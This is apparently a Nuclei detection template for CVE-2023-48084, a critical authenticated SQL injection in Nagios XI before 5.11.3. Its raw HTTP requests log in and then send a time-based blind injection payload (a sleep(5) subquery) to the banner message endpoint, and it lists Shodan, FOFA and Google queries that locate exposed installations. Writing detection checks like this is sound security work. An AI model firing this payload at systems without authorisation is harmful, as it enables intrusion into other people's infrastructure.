id: CVE-2023-48084 info: name: Nagios XI < 5.11.3 - SQL Injection author: ritikchaddha severity: critical description: | SQL injection vulnerability in Nagios XI before version 5.11.3 via the bulk modification tool. impact: | Successful exploitation could lead to unauthorized access to sensitive information. remediation: | Apply the vendor-supplied patch or upgrade to a non-vulnerable version. reference: - https://github.com/bucketcat/CVE-2023-48084 - https://github.com/Hamibubu/CVE-2023-48084 - https://nvd.nist.gov/vuln/detail/CVE-2023-48084 - https://github.com/nomi-sec/PoC-in-GitHub classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-48084 cwe-id: CWE-89 epss-score: 0.00114 epss-percentile: 0.44856 cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: nagios product: nagios_xi shodan-query: http.title:"nagios xi" fofa-query: - title="Nagios XI" - title="nagios xi" - app="nagios-xi" google-query: intitle:"nagios xi" tags: cve,cve2023,nagiosxi,sqli,authenticated,nagios http: - raw: - | GET /nagiosxi/login.php HTTP/1.1 Host: {{Hostname}} - | POST /nagiosxi/login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded nsp={{nsp}}&page=auth&debug=&pageopt=login&username={{username}}&password={{password}}&loginButton= - | @timeout: 15s GET /nagiosxi/index.php/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=(SELECT+CASE+WHEN+1=1+THEN+sleep(5)+ELSE+sleep(0)+END+) HTTP/1.1 Host: {{Hostname}} host-redirects: true max-redirects: 2 skip-variables-check: true matchers-condition: and matchers: - type: dsl dsl: - 'duration_3>=5' - 'contains(body_3, "Home Dashboard")' condition: and extractors: - type: regex name: nsp part: body group: 1 regex: - 'name="nsp" value="(.*)">' internal: true # digest: 490a004630440220177500e88fc209aa5ccfdc735f5b72fd05d71b6fa2e2f3deda7fb6c7c649ebae02207d01edc1254186264417bc50548c356df3197114ca076afcf20ce87f3a2ddb59:922c64590222798bb761d5b6d8e72950